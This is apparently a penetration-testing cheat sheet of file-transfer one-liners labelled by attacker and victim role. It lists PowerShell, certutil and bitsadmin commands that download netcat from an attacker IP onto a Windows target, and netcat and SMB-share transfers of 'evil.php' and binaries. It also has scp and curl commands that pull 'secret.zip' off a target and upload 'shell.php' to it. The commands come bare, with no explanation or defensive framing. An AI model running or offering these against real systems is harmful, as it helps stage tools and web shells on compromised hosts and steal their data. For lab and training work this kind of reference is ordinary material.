python3 -m http.server 80
python2 -m SimpleHTTPServer 80
powershell.exe -c (new-object System.Net.WebClient).DownloadFile('http://10.10.14.17/nc.exe','c:\temp\nc.exe')
powershell.exe -c (Start-BitsTransfer -Source "http://10.10.14.17/nc.exe -Destination C:\temp\nc.exe")
powershell.exe wget "http://10.10.14.17/nc.exe" -outfile "c:\temp\nc.exe"
certutil.exe -urlcache -split -f "http://10.10.14.17/nc.exe" c:\temp\nc.exe
bitsadmin /transfer job /download /priority high http://10.10.14.17/nc.exe c:\temp\nc.exe
Attacker:
nc -lvnp 443 < evil.php
Victim:
nc -v 192.168.42.42 443 > evil.php
Attacker:
python smbserver.py share .
Victom:
copy \\10.10.14.21\share\whoami.exe .
Attacker:
scp charix@10.10.10.84:secret.zip ./
scp -r user@targetIP:/path/to/share /local/share
# remote to local
curl --upload-file shell.php --url http://$ip/shell.php --http1.0
scp /path/to/local/file.txt user@targetIP:/path/to/share
# local to remote
